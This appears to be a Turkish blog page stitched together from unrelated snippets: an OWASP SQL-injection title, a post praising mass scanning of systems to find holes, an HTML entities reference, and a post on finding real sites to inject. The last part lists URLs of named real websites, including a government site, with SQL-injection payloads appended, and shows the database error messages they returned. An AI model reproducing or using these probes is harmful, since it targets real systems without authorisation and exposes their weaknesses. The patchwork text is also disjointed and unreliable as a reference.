Advanced Topics on SQL Injection Protection by OWASP

Kurcalarken-Gezerken:Nasa Hacker' ı ile Röportaj

Bugün Ferruh Mavituna'nın günlüğünü okurken oradan onun başka bir yazısına geçtim. Nasa sistemine giren hacker ile ilgili yazısı şurada:http://ferruh.mavituna.com/makale/nasa-hacker-i-ile-roportaj
Ama benim o hacker'dan çok vurgulamak istediğim yazıdaki şurası:

...
Zincir ve zayıf halka teorisinin kuralının en büyük örneklerinden biri
olsa gerek. Eğer yeterince sistemi tararsanız açık
bulabilirsiniz. Zamanında yahoo' da benzer bir şekilde
normalde internette hiç bir yerde bağlantısı olmayan bir iç proxy ile
hacklenmişti.
...

Bence açık bulmak için çok doğru ve yeterli bir yöntem, yeteri kadar sistemi taramak

HTML 4.01 Entities Reference

HTML 4.01 supports the ISO 8859-1 (Latin-1) character set.

The lower part of ISO-8859-1 (codes from 0-127) is the
original 7-BIT ASCII
standard.

Most of these characters can be used without a character reference.

The higher part of ISO-8859-1 (codes from 160-255) can all be used using
character entity names.

Sql sızma( injection) için gerçek siteleri nereden bulacağım?

Bu özet kullanılabilir değil. Yayını görüntülemek için lütfen burayı tıklayın.

Google araması ile sql test sitesi

http://www.driverara.org/sorudetay.asp?id=4715%27 having 1=1;--

Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 'soru.cat' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/sorudetay.asp, line 72

Google araması ile sql test sitesi

http://www.prc.gov/dockets.asp?ID=R2006-1'

Sunucu:Oracle
Hata:

Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Oracle][ODBC][Ora]ORA-01756: quoted string not properly terminated

/dockets.asp, line 41

http://www.trb.org/news/blurb_detail.asp?id=2326'

Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near ',','.

/news/blurb_detail.asp, line 24

Sql sızma denemeleri...
Sql injection